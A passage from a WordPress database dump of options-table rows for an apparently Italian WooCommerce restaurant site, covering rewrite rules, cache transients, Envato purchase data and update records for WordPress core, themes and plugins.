,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:62:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/wc-api(/(.*))?/?$\";s:99:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&wc-api=$matches[6]\";s:62:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:73:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:25:\"(.?.+?)/wc-api(/(.*))?/?$\";s:49:\"index.php?pagename=$matches[1]&wc-api=$matches[3]\";s:28:\"(.?.+?)/pagamento(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&pagamento=$matches[3]\";s:34:\"(.?.+?)/ordine-ricevuto(/(.*))?/?$\";s:58:\"index.php?pagename=$matches[1]&ordine-ricevuto=$matches[3]\";s:25:\"(.?.+?)/ordini(/(.*))?/?$\";s:49:\"index.php?pagename=$matches[1]&ordini=$matches[3]\";s:30:\"(.?.+?)/vedi-ordine(/(.*))?/?$\";s:54:\"index.php?pagename=$matches[1]&vedi-ordine=$matches[3]\";s:28:\"(.?.+?)/downloads(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&downloads=$matches[3]\";s:35:\"(.?.+?)/modifica-account(/(.*))?/?$\";s:59:\"index.php?pagename=$matches[1]&modifica-account=$matches[3]\";s:28:\"(.?.+?)/indirizzi(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&indirizzi=$matches[3]\";s:38:\"(.?.+?)/metodi-di-pagamento(/(.*))?/?$\";s:62:\"index.php?pagename=$matches[1]&metodi-di-pagamento=$matches[3]\";s:33:\"(.?.+?)/password-persa(/(.*))?/?$\";s:57:\"index.php?pagename=$matches[1]&password-persa=$matches[3]\";s:34:\"(.?.+?)/customer-logout(/(.*))?/?$\";s:58:\"index.php?pagename=$matches[1]&customer-logout=$matches[3]\";s:37:\"(.?.+?)/add-payment-method(/(.*))?/?$\";s:61:\"index.php?pagename=$matches[1]&add-payment-method=$matches[3]\";s:40:\"(.?.+?)/delete-payment-method(/(.*))?/?$\";s:64:\"index.php?pagename=$matches[1]&delete-payment-method=$matches[3]\";s:45:\"(.?.+?)/set-default-payment-method(/(.*))?/?$\";s:69:\"index.php?pagename=$matches[1]&set-default-payment-method=$matches[3]\";s:31:\".?.+?/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\".?.+?/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(290141,'woocommerce_default_homepage_layout','two_columns','no'),(313725,'woocommerce_admin_version','1.8.3','yes'),(290847,'auto_update_core_dev','enabled','yes'),(290848,'auto_update_core_minor','enabled','yes'),(290849,'auto_update_core_major','unset','yes'),(332373,'_transient_timeout_wpseo_total_unindexed_posts','1618887217','no'),(332374,'_transient_wpseo_total_unindexed_posts','317','no'),(332375,'_transient_timeout_wpseo_total_unindexed_terms','1618887217','no'),(332376,'_transient_wpseo_total_unindexed_terms','10','no'),(332377,'_transient_timeout_wpseo_total_unindexed_post_type_archives','1618887217','no'),(332378,'_transient_wpseo_total_unindexed_post_type_archives','0','no'),(332379,'_transient_timeout_wpseo_unindexed_post_link_count','1618887217','no'),(332380,'_transient_wpseo_unindexed_post_link_count','21','no'),(332381,'_transient_timeout_wpseo_unindexed_term_link_count','1618887217','no'),(332382,'_transient_wpseo_unindexed_term_link_count','11','no'),(294192,'can_compress_scripts','0','no'),(313720,'_transient_jetpack_autoloader_plugin_paths','a:1:{i:0;s:29:\"{{WP_PLUGIN_DIR}}/woocommerce\";}','yes'),(326539,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1612117576','no'),(321059,'sb_instagram_errors','a:8:{s:10:\"connection\";a:0:{}s:7:\"hashtag\";a:0:{}s:8:\"resizing\";s:218:\"Error editing image. invalid_image- Zero size image string passed | https://scontent.cdninstagram.com/vp/d656d8c98c18955cbcc5e4c838f0c16a/5C56D95A/t51.2885-19/s150x150/40022026_483330955515697_3524917434064568320_n.jpg\";s:15:\"database_create\";a:0:{}s:10:\"upload_dir\";a:0:{}s:8:\"accounts\";a:0:{}s:9:\"error_log\";a:1:{i:0;s:235:\"01-22 02:33:31 - Error editing image. invalid_image- Zero size image string passed | https://scontent.cdninstagram.com/vp/d656d8c98c18955cbcc5e4c838f0c16a/5C56D95A/t51.2885-19/s150x150/40022026_483330955515697_3524917434064568320_n.jpg\";}s:10:\"action_log\";a:0:{}}','no'),(324546,'_transient_wc_attribute_taxonomies','a:1:{i:0;O:8:\"stdClass\":6:{s:12:\"attribute_id\";s:1:\"1\";s:14:\"attribute_name\";s:14:\"numero-coperti\";s:15:\"attribute_label\";s:14:\"Numero Persone\";s:14:\"attribute_type\";s:4:\"text\";s:17:\"attribute_orderby\";s:10:\"menu_order\";s:16:\"attribute_public\";s:1:\"0\";}}','yes'),(324672,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:52;s:3:\"all\";i:48;s:8:\"approved\";s:2:\"48\";s:4:\"spam\";s:1:\"4\";s:9:\"moderated\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(325950,'action_scheduler_migration_status','complete','yes'),(331188,'_transient_timeout_wc_term_counts','1620994791','no'),(331189,'_transient_wc_term_counts','a:17:{i:28;s:1:\"4\";i:23;s:1:\"3\";i:26;s:1:\"1\";i:47;s:1:\"6\";i:57;s:1:\"7\";i:59;s:1:\"7\";i:63;s:1:\"6\";i:27;s:1:\"1\";i:65;s:1:\"6\";i:25;s:1:\"1\";i:66;s:1:\"5\";i:67;s:1:\"5\";i:12;s:1:\"7\";i:13;s:1:\"7\";i:68;s:1:\"5\";i:69;s:1:\"5\";i:11;s:1:\"1\";}','no'),(325958,'_transient_timeout_wf-plugin-info-accessibe','1612453451','no'),(324691,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1611692187','no'),(332400,'_transient_timeout__woocommerce_helper_updates','1618924615','no'),(332401,'_transient__woocommerce_helper_updates','a:4:{s:4:\"hash\";s:32:\"d751713988987e9331980363e24189ce\";s:7:\"updated\";i:1618881415;s:8:\"products\";a:0:{}s:6:\"errors\";a:1:{i:0;s:10:\"http-error\";}}','no'),(332394,'_site_transient_timeout_envato_market_plugins','1618885029','no'),(332395,'_site_transient_envato_market_plugins','a:4:{s:9:\"purchased\";a:1:{i:0;a:14:{s:2:\"id\";i:19191057;s:4:\"name\";s:30:\"WooCommerce Ultimate Gift Card\";s:6:\"author\";s:43:\"makewebbetter <webmaster@makewebbetter.com>\";s:7:\"version\";s:5:\"2.6.0\";s:11:\"description\";s:121:\"This woocommerce extension allow merchants to create and sell multiple Gift Card Product having multiple price variation.\";s:3:\"url\";s:67:\"https://codecanyon.net/item/woocommerce-ultimate-gift-card/19191057\";s:10:\"author_url\";s:41:\"https://codecanyon.net/user/makewebbetter\";s:13:\"thumbnail_url\";s:52:\"https://s3.envato.com/files/251678443/logo%20(2).png\";s:13:\"landscape_url\";s:64:\"https://s3.envato.com/files/327254486/gift-card-banner-2-7-7.jpg\";s:8:\"requires\";s:5:\"5.0.x\";s:6:\"tested\";s:5:\"5.6.x\";s:15:\"number_of_sales\";i:2631;s:10:\"updated_at\";s:25:\"2021-03-04T22:26:35+11:00\";s:6:\"rating\";d:4.75;}}s:6:\"active\";a:1:{s:65:\"woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card.php\";a:14:{s:2:\"id\";i:19191057;s:4:\"name\";s:30:\"WooCommerce Ultimate Gift Card\";s:6:\"author\";s:43:\"makewebbetter <webmaster@makewebbetter.com>\";s:7:\"version\";s:5:\"2.6.0\";s:11:\"description\";s:121:\"This woocommerce extension allow merchants to create and sell multiple Gift Card Product having multiple price variation.\";s:3:\"url\";s:67:\"https://codecanyon.net/item/woocommerce-ultimate-gift-card/19191057\";s:10:\"author_url\";s:41:\"https://codecanyon.net/user/makewebbetter\";s:13:\"thumbnail_url\";s:52:\"https://s3.envato.com/files/251678443/logo%20(2).png\";s:13:\"landscape_url\";s:64:\"https://s3.envato.com/files/327254486/gift-card-banner-2-7-7.jpg\";s:8:\"requires\";s:5:\"5.0.x\";s:6:\"tested\";s:5:\"5.6.x\";s:15:\"number_of_sales\";i:2631;s:10:\"updated_at\";s:25:\"2021-03-04T22:26:35+11:00\";s:6:\"rating\";d:4.75;}}s:9:\"installed\";a:0:{}s:7:\"install\";a:0:{}}','no'),(332396,'_transient_timeout__woocommerce_helper_subscriptions','1618882315','no'),(332397,'_transient__woocommerce_helper_subscriptions','a:0:{}','no'),(332398,'_site_transient_timeout_theme_roots','1618883215','no'),(332399,'_site_transient_theme_roots','a:5:{s:16:\"Impressive-child\";s:7:\"/themes\";s:6:\"attika\";s:7:\"/themes\";s:6:\"bistro\";s:7:\"/themes\";s:9:\"shop-isle\";s:7:\"/themes\";s:6:\"sydney\";s:7:\"/themes\";}','no'),(332402,'_site_transient_timeout_envato_market_themes','1618885020','no'),(332403,'_site_transient_envato_market_themes','a:4:{s:9:\"purchased\";a:0:{}s:6:\"active\";a:0:{}s:9:\"installed\";a:0:{}s:7:\"install\";a:0:{}}','no'),(332200,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/it_IT/wordpress-5.7.1.zip\";s:6:\"locale\";s:5:\"it_IT\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/it_IT/wordpress-5.7.1.zip\";s:10:\"no_content\";s:0:\"\";s:11:\"new_bundled\";s:0:\"\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.1\";s:7:\"version\";s:5:\"5.7.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.1\";s:7:\"version\";s:5:\"5.7.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.1\";s:7:\"version\";s:5:\"5.7.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1618881414;s:15:\"version_checked\";s:5:\"5.6.3\";s:12:\"translations\";a:0:{}}','no'),(332404,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1618881419;s:7:\"checked\";a:4:{s:6:\"attika\";s:3:\"1.4\";s:6:\"bistro\";s:3:\"1.0\";s:9:\"shop-isle\";s:6:\"1.1.62\";s:6:\"sydney\";s:4:\"1.74\";}s:8:\"response\";a:1:{s:6:\"sydney\";a:6:{s:5:\"theme\";s:6:\"sydney\";s:11:\"new_version\";s:4:\"1.76\";s:3:\"url\";s:36:\"https://wordpress.org/themes/sydney/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/sydney.1.76.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:1:{s:6:\"bistro\";a:6:{s:5:\"theme\";s:6:\"bistro\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:36:\"https://wordpress.org/themes/bistro/\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/theme/bistro.1.0.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}}','no'),(332405,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1618881428;s:7:\"checked\";a:39:{s:19:\"akismet/akismet.php\";s:5:\"4.1.9\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.33\";s:20:\"attika-core/main.php\";s:5:\"1.2.1\";s:47:\"attika-instagram-feed/attika-instagram-feed.php\";s:3:\"2.0\";s:26:\"attika-restaurant/main.php\";s:5:\"1.0.1\";s:43:\"attika-twitter-feed/attika-twitter-feed.php\";s:5:\"1.0.1\";s:53:\"child-theme-configurator/child-theme-configurator.php\";s:5:\"2.5.8\";s:41:\"child-theme-wizard/child-theme-wizard.php\";s:3:\"1.4\";s:33:\"classic-editor/classic-editor.php\";s:3:\"1.6\";s:39:\"column-shortcodes/column-shortcodes.php\";s:5:\"1.0.1\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:3:\"5.4\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:7:\"2.4.0.1\";s:55:\"iubenda-cookie-law-solution/iubenda_cookie_solution.php\";s:5:\"2.5.0\";s:59:\"woocommerce-direct-checkout/woocommerce-direct-checkout.php\";s:5:\"2.4.5\";s:31:\"envato-market/envato-market.php\";s:5:\"2.0.6\";s:37:\"lightbox-gallery/lightbox-gallery.php\";s:5:\"0.9.2\";s:29:\"wp-mail-bank/wp-mail-bank.php\";s:6:\"4.0.13\";s:36:\"mailjet-for-wordpress/wp-mailjet.php\";s:5:\"5.2.6\";s:27:\"maintenance/maintenance.php\";s:4:\"3.99\";s:21:\"mailin/sendinblue.php\";s:5:\"3.1.9\";s:23:\"page-list/page-list.php\";s:3:\"5.2\";s:31:\"popup-builder/popup-builder.php\";s:4:\"3.83\";s:26:\"post-smtp/postman-smtp.php\";s:6:\"2.0.22\";s:47:\"really-simple-captcha/really-simple-captcha.php\";s:3:\"2.1\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:6:\"4.0.14\";s:23:\"revslider/revslider.php\";s:6:\"6.2.23\";s:33:\"instagram-feed/instagram-feed.php\";s:3:\"2.9\";s:33:\"sydney-toolbox/sydney-toolbox.php\";s:4:\"1.15\";s:27:\"updraftplus/updraftplus.php\";s:7:\"1.16.53\";s:27:\"woocommerce/woocommerce.php\";s:5:\"4.9.2\";s:79:\"nm-woocommerce-checkout-field-manager/nm-woocommerce-checkout-field-manager.php\";s:3:\"6.0\";s:91:\"woocommerce-gateway-paypal-express-checkout/woocommerce-gateway-paypal-express-checkout.php\";s:5:\"2.1.1\";s:65:\"woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card.php\";s:5:\"2.7.3\";s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";s:5:\"1.1.5\";s:31:\"wp-serverinfo/wp-serverinfo.php\";s:4:\"1.66\";s:27:\"js_composer/js_composer.php\";s:5:\"6.4.1\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:7:\"0.9.1.7\";s:37:\"options-importer/options-importer.php\";s:1:\"5\";s:24:\"wordpress-seo/wp-seo.php\";s:6:\"16.1.1\";}s:8:\"response\";a:4:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.41\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.41.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2458349\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2458349\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:6:\"5.2.17\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"maintenance/maintenance.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/maintenance\";s:4:\"slug\";s:11:\"maintenance\";s:6:\"plugin\";s:27:\"maintenance/maintenance.php\";s:11:\"new_version\";s:4:\"4.02\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/maintenance/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/maintenance.4.02.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/maintenance/assets/icon-256x256.png?rev=2160987\";s:2:\"1x\";s:64:\"https://ps.w.org/maintenance/assets/icon-128x128.png?rev=2160987\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/maintenance/assets/banner-772x250.png?rev=1637471\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"woocommerce/woocommerce.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:6:\"plugin\";s:27:\"woocommerce/woocommerce.php\";s:11:\"new_version\";s:5:\"5.2.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/woocommerce/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/woocommerce.5.2.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/woocommerce/assets/icon-256x256.png?rev=2366418\";s:2:\"1x\";s:64:\"https://ps.w.org/woocommerce/assets/icon-128x128.png?rev=2366418\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/woocommerce/assets/banner-1544x500.png?rev=2366418\";s:2:\"1x\";s:66:\"https://ps.w.org/woocommerce/assets/banner-772x250.png?rev=2366418\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.7.1\";s:12:\"requires_php\";s:3:\"7.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"js_composer/js_composer.php\";O:8:\"stdClass\":6:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"new_version\";s:3:\"6.6\";s:6:\"plugin\";s:27:\"js_composer/js_composer.php\";s:3:\"url\";s:0:\"\";s:7:\"package\";b:0;s:4:\"name\";N;}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:27:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.9\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"child-theme-configurator/child-theme-configurator.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/child-theme-configurator\";s:4:\"slug\";s:24:\"child-theme-configurator\";s:6:\"plugin\";s:53:\"child-theme-configurator/child-theme-configurator.php\";s:11:\"new_version\";s:5:\"2.5.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/child-theme-configurator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/child-theme-configurator.2.5.8.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/child-theme-configurator/assets/icon-128x128.png?rev=1557885\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/child-theme-configurator/assets/banner-772x250.jpg?rev=1557885\";}s:11:\"banners_rtl\";a:0:{}}s:41:\"child-theme-wizard/child-theme-wizard.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:32:\"w.org/plugins/child-theme-wizard\";s:4:\"slug\";s:18:\"child-theme-wizard\";s:6:\"plugin\";s:41:\"child-theme-wizard/child-theme-wizard.php\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/child-theme-wizard/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/child-theme-wizard.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/child-theme-wizard/assets/icon-256x256.png?rev=984426\";s:2:\"1x\";s:70:\"https://ps.w.org/child-theme-wizard/assets/icon-128x128.png?rev=984426\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/child-theme-wizard/assets/banner-1544x500.png?rev=984451\";s:2:\"1x\";s:72:\"https://ps.w.org/child-theme-wizard/assets/banner-772x250.png?rev=984451\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"classic-editor/classic-editor.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/classic-editor\";s:4:\"slug\";s:14:\"classic-editor\";s:6:\"plugin\";s:33:\"classic-editor/classic-editor.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/classic-editor.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671\";s:2:\"1x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671\";s:2:\"1x\";s:69:\"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676\";}s:11:\"banners_rtl\";a:0:{}}s:39:\"column-shortcodes/column-shortcodes.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/column-shortcodes\";s:4:\"slug\";s:17:\"column-shortcodes\";s:6:\"plugin\";s:39:\"column-shortcodes/column-shortcodes.php\";s:11:\"new_version\";s:5:\"1.0.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/column-shortcode